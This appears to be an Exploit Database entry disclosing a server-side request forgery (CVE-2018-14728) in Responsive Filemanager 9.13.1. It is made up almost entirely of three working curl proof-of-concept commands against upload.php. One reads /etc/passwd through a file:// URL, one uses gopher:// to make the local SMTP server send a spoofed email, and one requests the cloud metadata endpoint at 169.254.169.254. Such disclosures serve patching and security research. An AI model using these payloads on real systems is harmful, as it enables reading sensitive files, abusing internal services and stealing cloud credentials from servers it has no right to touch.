Responsive Filemanager 9.13.1 - Server-Side Request Forgery

EDB-ID:

45103




Platform:

Linux

Date:

2018-07-30


# Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery
# Date: 2018-07-29
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728

# PoC
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=http://169.254.169.254/openstack'